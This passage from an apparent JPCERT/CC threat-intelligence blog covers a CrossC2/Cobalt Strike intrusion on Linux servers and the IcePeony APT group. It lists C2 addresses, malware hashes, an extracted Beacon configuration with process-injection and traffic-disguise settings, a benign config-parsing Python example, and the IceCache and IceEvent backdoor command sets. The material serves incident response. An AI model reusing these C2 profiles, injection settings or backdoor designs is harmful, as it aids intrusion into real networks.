JPCERTCC/aa-tools/parse_crossc2beacon_config.py <br /> <a href="https://github.com/JPCERTCC/aa-tools/blob/master/parse_crossc2beacon_config.py" target="_blank">https://github.com/JPCERTCC/aa-tools/blob/master/parse_crossc2beacon_config.py</a></p> <p>CrossC2 can generate binaries for macOS as well as Linux, and this configuration parser supports macOS binaries too. Figure 5 shows an example of the parser's output.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS05-800wri.png" width="800" height="689" alt="" class="asset asset-image at-xid-3824889 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 5: Example run of the configuration parser </div> <p><br></p> <h3>Closing</h3> <p>There are many incidents involving Cobalt Strike, but in this case we confirmed CrossC2, a tool that extends Cobalt Strike Beacon functionality across platforms, being used in an attack that compromised Linux servers on an internal network. Linux servers often lack EDR or similar protection and can become a starting point for expanding the scope of a compromise, so caution is needed. We hope the information in this post is useful for incident response and analysis. The C2 destinations and hash values of the malware we confirmed are listed in the Appendices.</p> <p style="text-align: right">Incident Response Group, Yuma Masubuchi (増渕 維摩)</p> <h4>References</h4> <p><a name="1"></a>[1] CrossC2 <a href="https://github.com/gloxec/CrossC2" target="_blank"><br>https://github.com/gloxec/CrossC2</a></p> <p><a name="2"></a>[2] OdinLdr <a href="https://github.com/emdnaia/OdinLdr" target="_blank"><br>https://github.com/emdnaia/OdinLdr</a></p> <p><a name="3"></a>[3] ANY.RUN<br> A new SystemBC RAT is targeting Linux-based platforms <a href="https://x.com/anyrun_app/status/1884207667058463188" target="_blank"><br>https://x.com/anyrun_app/status/1884207667058463188</a></p> <p><a name="4"></a>[4] GetNPUsers.py <a href="https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py" target="_blank"><br>https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py</a></p> <p><a name="5"></a>[5] Rapid7<br> BlackSuit Continues Social Engineering Attacks in Wake of Black Basta’s Internal Conflict <a href="https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict/" 
target="_blank"><br>https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict/</a></p> <h4>Appendix A: Example CrossC2 configuration</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>C2: 162.33.179[.]247:8443
PUBLICKEY:
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCaW
34Iv7znqVuomjiJn4Yr1ck9YSWylfAoiy20DnR0ab
CoHtdPK3L05CgOjnLGSfM5Vji0IRd8xtCGpU699Jt
FCa/Jg7zmuejilkKTFpMB36+49UQtaYp4KjFuImRC
z72NdzszsLzHDlVWAPmn5CSTfsTIzceomQfmCDY//
IygzQIDAQAB
-----END PUBLIC KEY-----</pre> <h4>Appendix B: Correspondence between ReadNimeLoader and the malware body</h4> <p>Table 1: Correspondence between ReadNimeLoader and the malware body</p> <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 24%;"> <col style="width: 9%;"> <col style="width: 30%;"> <col style="width: 24%;"> <col style="width: 13%;"> </colgroup> <thead> <tr> <th>ReadNimeLoader Hash(SHA256)</th> <th>Version</th> <th>Key</th> <th>readme.txt Hash(SHA256)</th> <th>Encoded Malware</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">56b941f6dcb769ae6d6995412559012abab830f05d5d8acf2648f7fa48c20833</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("mfzuyqroasv")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">6246fb5c8b714707ac49ade53e6fe5017d96442db393b1c0ba964698ae24245d</td> <td style="word-wrap: break-word; white-space: normal;">OdinLdr + CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">dfe79b9c57cfb9fc10597b43af1c0a798991b6ceeec2af9b1e0ed46e6a8661c8</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("vbewtdsmmswfweoz"))</td> <td style="word-wrap: break-word; white-space: 
normal;">acdf2a87ed03f2c6fe1d9899e8a74e8b56f7b77bb8aed5adf2cc374ee5465168</td> <td style="word-wrap: break-word; white-space: normal;">OdinLdr + CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">3f96b6589996e57abc1c4d9b732528d2d11dea5c814f8241170c14ca2cd0281d</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("lgehaoevolq")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">6b80d602472c76b1d0f05bcce62e0a34de758232d9d570ba61b540784c663c01</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">0ab709728666f8759ad8db574d4009cf74ebce36ef2572ef52b058997a9b2a25</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("ffjazoinsmsiywwt"))</td> <td style="word-wrap: break-word; white-space: normal;">3079a29575a0adff91f04c5493a7f3e1c89795e3a90cf842650cd8bd45c4e1bc</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ecca3194613b0bab02059c3544fdc90f6d4af5a4c06518c853517eb1d81b9735</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("bcstctskmngpjjax"))</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ad90a4490d82c7bd300fdbbdca0336e5ad2219d63ea0f08cebc33050d65b7ef2</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("lklzndaawijhd")) + zero padding</td> <td style="word-wrap: break-word; white-space: 
normal;">70b3b8e07752c1f3d4a462b2ab47ca3d9fb5094131971067230031b8b2cd84f2</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">99d6b73b1a9e66d7f6dcb3244ea0783b60776efd223d95c4f95e31fde434e258</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("ifovxtgokm|yzjwz"))</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> </tr> </tbody> </table> <h4>Appendix C: Example Cobalt Strike configuration</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>BeaconType                   - HTTPS
Port                         - 443
SleepTime                    - 30000
MaxGetSize                   - 2097328
Jitter                       - 40
MaxDNS                       - Not Found
PublicKey_MD5                - d67a7903c6777d64b69845b6fcd5db65
C2Server                     - 64.95.10[.]209,/Collector/2.0/settings/,179.60.149[.]209,/Collector/2.0/settings/,64.52.80[.]62,/Collector/2.0/settings/
UserAgent                    - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.4.00.2879 Chrome/80.0.3987.165 Electron/8.5.1 Safari/537.36
HttpPostUri                  - /MkuiIJzM2IZs
Malleable_C2_Instructions    - Remove 46 bytes from the end
                               Remove 130 bytes from the beginning
                               NetBIOS decode 'a'
HttpGet_Metadata             - ConstHeaders
                               Accept: json
                               Host: westeurope-teams.azureedge.net
                               Referer: https://teams.microsoft.com/_
                               x-ms-session-id: f73c3186-057a-d996-3b63-b6e5de6ef20c
                               x-ms-client-type: desktop
                               x-mx-client-version: 27/1.0.0.2021020410
                               Accept-Encoding: gzip, deflate, br
                               Origin: https://teams.microsoft.com
                               ConstParams
                               qsp=true
                               client-id=NO_AUTH
                               sdk-version=ACT-Web-JS-2.5.0&
                               Metadata
                               base64url
                               parameter "events"
HttpPost_Metadata            - ConstHeaders
                               Connection: Keep-Alive
                               Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                               SessionId
                               base64url
                               parameter "id"
                               Output
                               base64url
                               print
PipeName                     - Not Found
DNS_Idle                     - Not Found
DNS_Sleep                    - Not Found
SSH_Host                     - Not Found
SSH_Port                     - Not Found
SSH_Username                 - Not Found
SSH_Password_Plaintext       - Not Found
SSH_Password_Pubkey          - Not Found
SSH_Banner                   -
HttpGet_Verb                 - GET
HttpPost_Verb                - POST
HttpPostChunk                - 0
Spawnto_x86                  - %windir%\syswow64\powercfg.exe
Spawnto_x64                  - %windir%\sysnative\powercfg.exe
CryptoScheme                 - 0
Proxy_Config                 - Not Found
Proxy_User                   - Not Found
Proxy_Password               - Not Found
Proxy_Behavior               - Use IE settings
Watermark_Hash               - NtZOV6JzDr9QkEnX6bobPg==
Watermark                    - 987654321
bStageCleanup                - True
bCFGCaution                  - True
KillDate                     - 0
bProcInject_StartRWX         - True
bProcInject_UseRWX           - False
bProcInject_MinAllocSize     - 8096
ProcInject_PrependAppend_x86 - Empty
ProcInject_PrependAppend_x64 - Empty
ProcInject_Execute           - ntdll.dll:RtlUserThreadStart
                               NtQueueApcThread-s
                               SetThreadContext
                               CreateRemoteThread
                               kernel32.dll:LoadLibraryA
                               RtlCreateUserThread
ProcInject_AllocationMethod  - VirtualAllocEx
bUsesCookies                 - False
HostHeader                   -
headersToRemove              - Not Found
DNS_Beaconing                - Not Found
DNS_get_TypeA                - Not Found
DNS_get_TypeAAAA             - Not Found
DNS_get_TypeTXT              - Not Found
DNS_put_metadata             - Not Found
DNS_put_output               - Not Found
DNS_resolver                 - Not Found
DNS_strategy                 - round-robin
DNS_strategy_rotate_seconds  - -1
DNS_strategy_fail_x          - -1
DNS_strategy_fail_seconds    - -1
Retry_Max_Attempts           - 0
Retry_Increase_Attempts      - 0
Retry_Duration               - 0</pre> <h4>Appendix D: Network</h4> <ul> <li>64.52.80[.]62:443</li> <li>64.95.10[.]209:443</li> <li>67.217.228[.]55:443</li> <li>137.184.155[.]92:443</li> <li>159.65.241[.]37:443</li> <li>162.33.179[.]247:8443</li> <li>165.227.113[.]183:443</li> <li>179.60.149[.]209:443</li> <li>192.241.190[.]181:443</li> <li>api.glazeceramics[.]com:443</li> <li>doc.docu-duplicator[.]com:53</li> <li>doc2.docu-duplicator[.]com:53</li> <li>comdoc1.docu-duplicator[.]com:53</li> </ul> <h4>Appendix E: Malware</h4> <p>Table 2: List of malware and tools</p> <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 15%;"> <col style="width: 15%;"> <col style="width: 70%;"> 
</colgroup> <thead> <tr> <th>Malware</th> <th>Filename</th> <th>Hash(SHA256)</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">java(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">java.exe</td> <td style="word-wrap: break-word; white-space: normal;">16b1819186f0803b9408d9a448a176142f8271a4bc0b42cdb78eb4489bce16fe</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">56b941f6dcb769ae6d6995412559012abab830f05d5d8acf2648f7fa48c20833</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">dfe79b9c57cfb9fc10597b43af1c0a798991b6ceeec2af9b1e0ed46e6a8661c8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">3f96b6589996e57abc1c4d9b732528d2d11dea5c814f8241170c14ca2cd0281d</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">0ab709728666f8759ad8db574d4009cf74ebce36ef2572ef52b058997a9b2a25</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">ecca3194613b0bab02059c3544fdc90f6d4af5a4c06518c853517eb1d81b9735</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: 
normal;">ad90a4490d82c7bd300fdbbdca0336e5ad2219d63ea0f08cebc33050d65b7ef2</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">99d6b73b1a9e66d7f6dcb3244ea0783b60776efd223d95c4f95e31fde434e258</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">6246fb5c8b714707ac49ade53e6fe5017d96442db393b1c0ba964698ae24245d</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">acdf2a87ed03f2c6fe1d9899e8a74e8b56f7b77bb8aed5adf2cc374ee5465168</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">6b80d602472c76b1d0f05bcce62e0a34de758232d9d570ba61b540784c663c01</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">3079a29575a0adff91f04c5493a7f3e1c89795e3a90cf842650cd8bd45c4e1bc</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">70b3b8e07752c1f3d4a462b2ab47ca3d9fb5094131971067230031b8b2cd84f2</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">CrossC2</td> <td style="word-wrap: break-word; white-space: normal;">gds</td> <td style="word-wrap: break-word; white-space: 
normal;">28d668f3e1026a56d55bc5d6e36fad71622c1ab20ace52d3ab12738f9f8c6589</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">CrossC2</td> <td style="word-wrap: break-word; white-space: normal;">gss</td> <td style="word-wrap: break-word; white-space: normal;">9e8c550545aea5212c687e15399344df8a2c89f8359b90d8054f233a757346e7</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ELF-SystemBC</td> <td style="word-wrap: break-word; white-space: normal;">monitor</td> <td style="word-wrap: break-word; white-space: normal;">74a33138ce1e57564baa4ea4db4a882d6bf51081b79a167a6cb2bf9130ddad7f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ELF-SystemBC</td> <td style="word-wrap: break-word; white-space: normal;">monitor</td> <td style="word-wrap: break-word; white-space: normal;">7ccff87db7b4e6bc8c5a7e570f83e26ccb6f3a8f72388210af466048d3793b00</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">GetNPUsers</td> <td style="word-wrap: break-word; white-space: normal;">GetNPUsers_windows.exe</td> <td style="word-wrap: break-word; white-space: normal;">e0e827198a70eef6c697559660106cfab7229483b0cd7f0c7abd384a3d2ee504</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Tools related to privilege escalation</td> <td style="word-wrap: break-word; white-space: normal;">wermgr.exe</td> <td style="word-wrap: break-word; white-space: normal;">f79e047ae4834e6a9234ca1635f18b074a870b366fe4368c10c2ddc56dfbb1bc</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Tools related to privilege escalation</td> <td style="word-wrap: break-word; white-space: normal;">wermgr.exe</td> <td style="word-wrap: break-word; white-space: normal;">ac02aee660d44a8bfbc69e9c46cf402fd41e99915e13d0de3977e662ef13b2ca</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Plink v0.81</td> <td style="word-wrap: break-word; white-space: normal;">conhost.exe</td> <td style="word-wrap: 
break-word; white-space: normal;">2e338a447b4ceaa00b99d742194d174243ca82830a03149028f9713d71fe9aab</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">PsExec v2.43</td> <td style="word-wrap: break-word; white-space: normal;">PsExec.exe</td> <td style="word-wrap: break-word; white-space: normal;">078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">cab-related tool</td> <td style="word-wrap: break-word; white-space: normal;">hhupd.exe</td> <td style="word-wrap: break-word; white-space: normal;">d74eac55eeaa3138bc1e723c56013bb1af7709f0a77308bfbf268d4e32b37243</td> </tr> </tbody> </table>
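The CrossC2 section above describes a configuration block appended after the last byte of the binary ("HOOK" tag, size field, AES-128-CBC ciphertext without padding) and explains that UPX unpacking only works once that trailing block is stripped and later re-appended. The following Python is an added example and is not JPCERT/CC's parse_crossc2beacon_config.py nor any CrossC2 code. It assumes the size field is a 32-bit little-endian integer (the post does not state the byte order) and stops short of decryption, since the key is not given here; the sample bytes are constructed.

```python
import struct

HOOK_TAG = b"HOOK"   # search tag at offset 0x0 of the trailing config block (from the post)
HEADER_LEN = 8       # 4-byte tag + 4-byte size; little-endian size is an assumption
AES_BLOCK = 16       # AES-128-CBC without padding: ciphertext length must be a block multiple

# Constructed sample, not a real CrossC2 Beacon: a fake packed body that also contains the
# literal "HOOK" (as the real binary must, because it searches for that string) followed by
# a bogus size, plus a well-formed 32-byte config block appended at the very end.
SAMPLE_BODY = b"\x7fELF" + b"\x00" * 16 + b"HOOK" + b"\xff\xff\xff\xff" + b"\x00" * 8
SAMPLE_TAIL = HOOK_TAG + struct.pack("<I", 32) + bytes(range(32))
SAMPLE_FILE = SAMPLE_BODY + SAMPLE_TAIL


def find_config(data: bytes):
    """Return (offset, enc_size, enc_blob) for the trailing config block, or None.

    The scan starts from the end of the file and walks backwards so that an earlier
    occurrence of "HOOK" inside the code (e.g. the search-tag constant itself) is only
    considered if no later candidate has a plausible header."""
    pos = data.rfind(HOOK_TAG)
    while pos != -1:
        if pos + HEADER_LEN <= len(data):
            (size,) = struct.unpack_from("<I", data, pos + 4)   # assumed little-endian
            blob = data[pos + HEADER_LEN : pos + HEADER_LEN + size]
            if size and len(blob) == size and size % AES_BLOCK == 0:
                return pos, size, blob
        pos = data.rfind(HOOK_TAG, 0, pos)
    return None


def split_tail(data: bytes):
    """Separate the packed body from the trailing config so UPX can unpack the body alone."""
    hit = find_config(data)
    if hit is None:
        raise ValueError("no HOOK-tagged configuration block found")
    offset, size, _ = hit
    end = offset + HEADER_LEN + size
    return data[:offset], data[offset:end]


def reattach(body: bytes, tail: bytes) -> bytes:
    """Append the saved config block to the unpacked body, as the post describes."""
    return body + tail


if __name__ == "__main__":
    offset, size, blob = find_config(SAMPLE_FILE)
    print(f"config at 0x{offset:x}, {size} encrypted bytes")
    body, tail = split_tail(SAMPLE_FILE)
    assert reattach(body, tail) == SAMPLE_FILE
```

The `enc_blob` returned by `find_config` is what would be handed to an AES-128-CBC decrypt call with no padding; the sample deliberately plants a decoy "HOOK" in the body to show why the block-size and length checks are needed.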
  54. IcePeony with the ‘996’ work culture

    Wed, 16 Oct 2024 15:00:00 -0000

    This blog post is based on “IcePeony with the ‘996’ work culture” that we presented at VB2024. We are grateful to Virus Bulletin for giving us the opportunity to present. https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/

    tl;dr

    We have discovered a previously unknown China-nexus APT group, which we have named “IcePeony”. Due to operational mistakes, they exposed their resources, allowing us to uncover details of their attacks. IcePeony is a China-nexus APT group that has been active since at least 2023. They have targeted government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam. Their attacks typically start with SQL injection, followed by compromise via webshells and backdoors. Interestingly, they use a custom IIS malware called “IceCache”. Through extensive analysis, we strongly believe that IcePeony is a China-nexus APT group operating under harsh work conditions.

    IcePeony

    IcePeony is a previously unknown attack group. Our research shows that they have been active since at least 2023. They mainly target Asian countries, such as India and Vietnam. In the log files we analyzed, there were over 200 attempts to attack various government websites in India. They use SQL injection attacks on public web servers; if they find a vulnerability, they install a webshell or malware. Ultimately, their goal is to steal credentials.

    We believe IcePeony works for China’s national interests; it is possible that they prioritize China’s maritime strategy. Our research found that IcePeony targeted government and academic institutions in India, political parties in Vietnam, and government institutions in Mauritius. Recently, they may also have attacked Brazil. It is likely that they will expand their targets in the future.

    OPSEC fail

    In July, we identified a host that was publicly exposing various attack tools, including CobaltStrike and sqlmap, via an open directory.

    One of the most interesting findings was the zsh_history file. Similar to bash_history, the zsh_history file records command history; however, zsh_history also logs timestamps, allowing us to pinpoint the exact time each command was executed. This enabled us to construct a highly detailed timeline of the attack. Unlike a typical timeline created by an IR or SOC analyst, this one offers insight from the attacker’s perspective: we could observe their trial-and-error process and how they executed the intrusion.

    The zsh_history was not the only interesting file; there were many others. For example, IcePeony had configured several helper commands in their alias file, including shortcuts to simplify lengthy commands and commands to quickly access help information. Here is an example with Mimikatz: by typing “hPass”, the attacker could display basic tutorials for Mimikatz. This improved their effectiveness during attacks.

    Intrusion Timeline

    We obtained two weeks’ worth of command history from the zsh_history. Let’s go through the events of each day.

    On day-1, the attacker attempted SQL injections on several government websites. When the exploit succeeded, they installed a webshell or IceCache, establishing a foothold for the attack. On day-2, they reviewed the domain information of compromised hosts and created accounts for further exploitation. On day-3, which was a Sunday, they did not perform any actions; it seems the attacker does not work on Sundays. On day-4, they used IceCache to configure proxy rules (we explain this in more detail later). On day-5, the attacker expanded their reach by attempting more SQL injections on other government websites. On day-6, they used various tools, including IcePeony’s custom tool called StaX and a rootkit called Diamorphine. On day-7, they continued to attack other hosts using tools like URLFinder and sqlmap. On day-8, they used IceCache to steal information from the compromised environment, focusing especially on domain users. On day-9, they were quiet and only performed connection checks. On day-10, they did nothing since it was a Sunday. On day-11, they used tools like craXcel and WmiExec; craXcel is an open-source tool for unlocking password-protected Microsoft Office files. On day-12, they used IceCache to add proxy rules and set up persistence with scheduled tasks. On day-13 and day-14, they explored other hosts for further exploitation.

    Over the course of two weeks, the attacker utilized a variety of tools and commands to compromise government websites and exfiltrate information.

    Tools

    IcePeony uses a wide range of tools, with a particular preference for open-source ones. Here, we highlight only the most distinctive tools they use.

    StaX

    StaX is a customized variant of the open-source tool Stowaway, a high-performance proxy tool. The attacker enhanced Stowaway with custom processing; based on development strings, we call this version StaX. StaX adds encryption of the communication targets specified in active mode, using a custom Base64 and AES.

    ProxyChains

    ProxyChains is an open-source proxy tool. The attacker used ProxyChains to run script files on victim hosts. info.sh is a script that collects system information from the compromised environment: environment information, user information, installed tool versions, network settings, SSH configuration files, and command history. linux_back.sh is a script for backdoors and persistence; it downloads and runs a backdoor shell script from the server and creates backdoor users. Interestingly, they installed a rootkit called Diamorphine, which is available on GitHub.

    Malware

    The IcePeony server contained malware targeting IIS, which we named IceCache. They used IceCache against the attack-surface server. Additionally, during the investigation we discovered another related malware, which we called IceEvent. Although no logs of IceEvent being used were found, we believe it was used to compromise another computer that was not connected to the internet.

    IceCache

    IceCache is an ELF64 binary developed in Go language. It is customized based on the open-source software reGeorge. To facilitate their intrusion operations, they added file transmission commands and command execution functionality. The IceCache module is installed and run on IIS servers. The number of commands changes over time, but the modules are classified into two types based on their authentication tokens.

    We found files with remaining PDB information. These files were developed by a user named “power” in a project called “cachsess”.

    PDB Path
    C:\Users\power\documents\visual studio 2017\Projects\cachsess\x64\Release\cachsess.pdb
    C:\Users\power\Documents\Visual Studio 2017\Projects\cachsess\Release\cachsess32.pdb

    The number of commands changes over time, but it includes command execution functions, SOCKS proxy functions, and file transmission functions.

    TYPE-A
      EXEC / EXEC_PRO     Command to direct the execution of a process
      SOCKS_HELLO         SOCKS protocol initial handshake message
      SOCKS_CONNECT       Command to indicate a connection request with the SOCKS protocol
      SOCKS_DISCONNECT    Command to indicate disconnection with the SOCKS protocol
      SOCKS_READ          Command to direct reading of data in the SOCKS protocol
      SOCKS_FORWARD       Command to instruct data transfer via the SOCKS protocol
      PROXY_ADD           Command to add a proxy
      PROXY_LIST          Command to list proxies
      PROXY_DEL           Command to delete a proxy
      PROXY_CLEAR         Command to clear all proxy settings
      PROXY_SET_JS        Set the JavaScript
      PROXY_GET_JS        Get the JavaScript that was set
      PROXY_ALLOW_PC      Allowed PC settings
      PROXY_CACHE_CLEAR   Command to clear the proxy cache
      PROXY_CACHE_TIME    Command to set the proxy cache time
      FILE_UPLOAD         Upload files
      FILE_DOWNLOAD       Download files

    TYPE-B
      EXEC / EXEC_PRO                     Command that directs the execution of a process
      SOCKS_HELLO                         SOCKS protocol initial handshake message
      SOCKS_CONNECT                       Command to indicate a connection request with the SOCKS protocol
      SOCKS_DISCONNECT                    Command to indicate disconnection with the SOCKS protocol
      SOCKS_READ                          Command that directs reading of data in the SOCKS protocol
      SOCKS_FORWARD                       Command to instruct data transfer via the SOCKS protocol
      PROXY_ADD                           Command to add a proxy
      PROXY_LIST                          Command to list proxies
      PROXY_DEL                           Command to delete a proxy
      PROXY_CLEAR                         Command to clear all proxy settings
      FILE_UPLOAD / FILE_UPLOAD_PRO       Upload files
      FILE_DOWNLOAD / FILE_DOWNLOAD_PRO   Download files
      IIS_VERSION                         Show IIS version

    These are the IceCache modules found so far. The first sample we are aware of was compiled in August 2023 and submitted to VirusTotal in October. Since there is no discrepancy between the compile time and the first submission, we believe the dates are reliable. Many new samples have also been found since 2024. Most of the submitters are from India, which matches the victim information we have gathered from OpenDir data. The number of commands has changed over time.
It is show that the malware’s developers have made improvements while continuing their intrusion operations. sha256[:8] Compile Time First Submission Submitter Cmd Num X-Token TYPE 5b16d153 2024-07-17 09:11:14 2024-08-03 04:58:20 c8d0b2b9 (ID) 20 tn7rM2851XVvOFbc B 484e2740 2024-06-21 03:05:15 2024-08-07 09:25:53 39d4d6d2 - email 20 tn7rM2851XVvOFbc B 11e90e24 2024-06-05 03:52:48 2024-06-18 12:21:50 d9cb313c (ID) 20 tn7rM2851XVvOFbc B b8d030ed 2024-06-05 03:52:41 2024-06-18 10:47:18 408f1927 (ID) 20 tn7rM2851XVvOFbc B ceb47274 2024-04-25 09:53:26 2024-08-02 21:50:50 06ac9f47 (BR) 20 tn7rM2851XVvOFbc B d1955169 2024-04-21 11:29:25 2024-06-18 12:24:39 d9cb313c (ID) 18 tn7rM2851XVvOFbc B de8f58f0 2024-04-21 11:29:10 2024-06-18 10:49:53 408f1927 (ID) 18 tn7rM2851XVvOFbc B 53558af 2024-03-27 05:08:50 2024-04-19 07:57:19 c2440bbf (ID) 18 tn7rM2851XVvOFbc B 0b8b10a2 2024-03-27 05:08:57 2024-04-18 13:54:16 c2440bbf (ID) 18 tn7rM2851XVvOFbc B a66627cc 2024-02-20 09:36:12 2024-03-12 15:17:55 a6412166 (VN) 16 cbFOvVX1582Mr7nt A e5f520d9 2024-02-01 09:32:21 2024-07-17 09:30:54 24761b38 (SG) 24 cbFOvVX1582Mr7nt A 3eb56218 2023-12-07 03:04:16 2024-02-20 13:54:02 0f09a1ae (ID) 24 cbFOvVX1582Mr7nt A 5fd5e99f 2023-09-27 00:50:46 2024-03-24 08:59:02 Ca43fb0f (ID) 24 cbFOvVX1582Mr7nt A 0eb60e4c 2023-08-23 09:11:24 2023-10-18 10:11:00 0e8f2a34 (VN) 18 cbFOvVX1582Mr7nt A IceEvent IceEvent is a simple passive-mode backdoor that installed as a service. PDB Path C:\Users\power\Documents\Visual Studio 2017\Projects\WinService\x64\Release\WinService.pdb Two types have been identified based on the command format. Both types only have the minimum necessary commands. The older type was discovered in September 2023, and several new types were found in April of this year. All of these were submitted from India. 
TYPE-A Description FILE: Command to Reading files via sockets CMD: Command to the execution of a process TYPE-B Description UPFILE Upload Files DOWNFILE Download Files CMD Command to the execution of a process sha256[:8] Compile Time First Submission Submitter Cmd Num TYPE 80e83118 2024-04-25 09:50:58 2024-07-25 05:43:08 INDIA (99003aca) 3 B 9aba997b 2024-04-30 04:48:48 2024-06-14 05:46:49 INDIA (060734bd) 3 B 9a0b0439 2024-04-25 09:50:58 2024-06-14 05:00:08 INDIA (060734bd) 3 B bc94da1a 2023-08-23 08:52:46 2023-09-05 03:03:57 INDIA (81f8b666) 2 A Similarities We believe that IceEvent was developed because a simple passive backdoor was needed during intrusions, based on code similarities with IceCache. Both IceCache and IceEvent use the same key for XOR to encode communication data. And PDB information shows that the same developer created both malware. This is the XOR-based data encoding process used for communication data, which is equal to both malware. This is the command execution process equal to both malware. Since the function calls and branching processes are exactly the same, we believe they were compiled from the same source code. Other commands also match perfectly. The communication data of IceCache and IceEvent is only encoded using the XOR process mentioned earlier, making it easy to decode. Here is an example of decoding the data during command execution. Attribution We investigated the attacker’s activity times based on the timestamp information in the zsh_history file. As a result, we found that the attacker is likely operating in the UTC+8 time zone. Surprisingly, the attacker works from 8 a.m. to 10 p.m., which is a 14-hour workday. They are remarkably diligent workers. Similarly, we investigated the changes in activity based on the day of the week. It seems that the attackers work six days a week. While they are less active on Fridays and Saturdays, their only full day off appears to be Sunday. 
